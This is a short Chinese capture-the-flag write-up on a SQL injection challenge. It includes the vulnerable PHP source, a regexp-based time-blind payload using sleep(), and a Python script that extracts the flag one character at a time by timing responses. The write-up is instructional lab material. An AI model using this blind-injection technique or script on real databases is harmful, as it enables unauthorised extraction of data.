考点:regexp注入+时间盲注
源码:
<?php # flag在fl4g里 include 'waf.php'; header("Content-type: text/html; charset=utf-8"); $db = new mysql(); $id = $_GET['id']; if ($id) { if(check_sql($id)){ exit(); } else { $sql = "select * from flllllllag where id=$id"; $db->query($sql); } } highlight_file(__FILE__);
union select ' = 都ban了,但sleep()没ban
考虑regexp代替 = 的时间盲注
?id=1 or if((length (datanase()) regexp 5, sleep(5),1)
exp:
#脚本来源https://www.gem-love.com/ctf/1669.html#i-2
import requests import time import datetime from urllib.parse import quote url = "http://2c2d306b5d6745be846972da7fd262b6e3668d53fa124de3.changame.ichunqiu.com/?id=111" alphabet = ['?','!',',','|','[',']','{','}','_','/','*','-','+','&',"%",'#','@','$','~','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9'] target = 'fl4g' result = '' print('www.gem-love.com') for i in range (1,33): for char in alphabet: # 设置payload payload =' or if((substr(({}),{},1) regexp "^{}"),sleep(3),1)'.format(target, i, char) # 计算响应时长 start = int(time.time()) r = requests.get(url+quote(payload)) response_time = int(time.time()) - start if response_time >= 2: result += char print('Found: {}'.format(result)) break